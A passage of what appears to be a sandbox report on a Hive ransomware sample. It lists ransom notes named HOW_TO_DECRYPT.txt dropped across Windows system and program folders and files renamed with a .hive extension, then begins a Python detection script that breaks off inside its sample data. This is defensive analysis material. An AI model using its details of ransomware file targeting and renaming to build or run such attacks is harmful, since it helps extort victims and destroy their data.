File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\DriverStore\FileRepository\prnin003.inf_amd64_neutral_3a3c6293d0cda862\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\GroupPolicy\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnca00y.inf_amd64_neutral_64560c72e81f6ad7\Amd64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\es-ES\Licenses\eval\StarterE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\it-IT\Licenses\_Default\StarterN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\eval\HomeBasic\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wpdfs.inf_amd64_neutral_fc4ebadff3a40ae4\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\es-ES\Licenses\eval\EnterpriseN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\eaphost.inf_amd64_neutral_4506dea11740c089\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\fr\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\es-ES\Licenses\OEM\Enterprise\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\ja-JP\Licenses\eval\EnterpriseE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\ja-JP\Licenses\_Default\Ultimate\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\migration\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\spp\tokens\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\dot4prt.inf_amd64_neutral_e7d3f62d0d4411db\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\LogFiles\SQM\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Tasks\WPD\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\it-IT\Licenses\eval\EnterpriseN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnky305.inf_amd64_ja-jp_4d77cc4802b17ec3\Amd64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\de-DE\Licenses\eval\EnterpriseN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\XPSViewer\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\eval\UltimateN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\sysprep\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\XPSViewer\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_neutral_4b99fffee061ff26\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\de-DE\Licenses\_Default\Starter\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\smartcrd.inf_amd64_neutral_6fb75ea318f84fe5\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Setup\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8TXB0XXK\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\migwiz\dlmanifests\Networking-MPSSVC-Svc\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\com\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\OEM\ProfessionalN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\_Default\HomePremiumN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\migration\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\it-IT\Licenses\_Default\HomeBasic\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\en-US\Licenses\_Default\UltimateN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\WCN\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmolic.inf_amd64_neutral_a53ac1a125d227fc\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\IME\imekr8\applets\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\Msdtc\Trace\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\eval\ProfessionalN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\fr-FR\Licenses\eval\HomePremium\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\migwiz\PostMigRes\Web\base_images\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnky302.inf_amd64_ja-jp_dd74fe49601b74f6\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AW10BNB7\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\it-IT\Licenses\OEM\HomeBasicN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\de-DE\Licenses\eval\StarterE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\en-US\Licenses\_Default\EnterpriseN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\SMI\Manifests\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\it-IT\Licenses\eval\HomeBasicE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\_Default\Ultimate\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmc26a.inf_amd64_neutral_547edd894d7c19d9\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnkm004.inf_amd64_neutral_d2aee42dc9c393ea\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\migwiz\dlmanifests\Microsoft-Windows-IasServer-MigPlugin\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmrock4.inf_amd64_neutral_e45293c539584293\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\SMI\Store\Machine\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\wbem\xml\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnlx00y.inf_amd64_neutral_977318f2317f5ddd\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\config\TxR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kamchatka.-uYcD1toMB6z-bE3g_VWOSQIsO8IMhgF7aX1QOzV71k.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_filter\liberase_plugin.dll.-uYcD1toMB6z-bE3g_VWOXYURyTcJN8z4dP3lvbZulE.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01291_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200521.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\css\settings.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OUTLVBS.DLL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\psuser_64.dll.-uYcD1toMB6z-bE3g_VWOZdsFKYB17Nw4Hd7fllFEAk.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\it-IT\css\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\policytool.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB1B.BDR C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Eirunepe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\msdasql.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar.-uYcD1toMB6z-bE3g_VWOWYmM4bVA6goIhfl0etOVCg.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\ja\System.Data.Entity.Resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\RSSFeeds.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FS3BOX.POC C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jerusalem C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\ja-JP\InkObj.dll.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\MedianLetter.Dotx C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NEWS.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Easter C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\highDpiImageSwap.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04385_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\sw\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_heb.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\Java\jre7\bin\plugin2\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\ink\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\es-ES\DVDMaker.exe.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152892.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ndjamena.-uYcD1toMB6z-bE3g_VWOejkriX1C3kBXs7XK-NDOTE.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\js\RSSFeeds.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libnormvol_plugin.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\SETUP.CHM C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGPUNCT.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\instrument.dll.-uYcD1toMB6z-bE3g_VWOTM_qx8rQvwbv9OeH7Mlaxw.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_filter\libcanvas_plugin.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Windows Media Player\Network Sharing\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Faculty.accdt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\css\settings.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_filter\libscene_plugin.dll.-uYcD1toMB6z-bE3g_VWOZckA1cwiKxC3-vmLcM_dxA.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
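
The rows above are a flattened sandbox table, and two Hive artefacts worth turning into detections are visible in them: the ransom note HOW_TO_DECRYPT.txt created in nearly every directory the sample touches, and encrypted files renamed to <original name>.<43 characters>.hive, where the first 21 characters of that token (-uYcD1toMB6z-bE3g_VWO) are identical across every renamed file in this run and only the remainder varies. The Python below is an added example for this report, not sandbox output or code from the sample: it parses rows in this page's layout (description, indicator path, process path, target) into fields, derives those two indicators per process, and applies a simple ransomware-like rule. The field-splitting heuristic (the last " C:\" in a row starts the process path), the rule thresholds and the function names are assumptions made here; the eight sample rows are copied verbatim from the tables on this page.

```python
"""Derive Hive ransomware indicators from flattened sandbox file-event rows.

Added example for this report (not sandbox output). Assumed row layout, as on
this page:  <Description> <Indicator path> <Process path> <Target>
"""
import os
import re
from collections import defaultdict

# Sample rows copied from the behavioral tables on this page.
SAMPLE_ROWS = r"""
File created C:\Windows\SysWOW64\GroupPolicy\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Tasks\WPD\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kamchatka.-uYcD1toMB6z-bE3g_VWOSQIsO8IMhgF7aX1QOzV71k.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_filter\liberase_plugin.dll.-uYcD1toMB6z-bE3g_VWOXYURyTcJN8z4dP3lvbZulE.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\psuser_64.dll.-uYcD1toMB6z-bE3g_VWOZdsFKYB17Nw4Hd7fllFEAk.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
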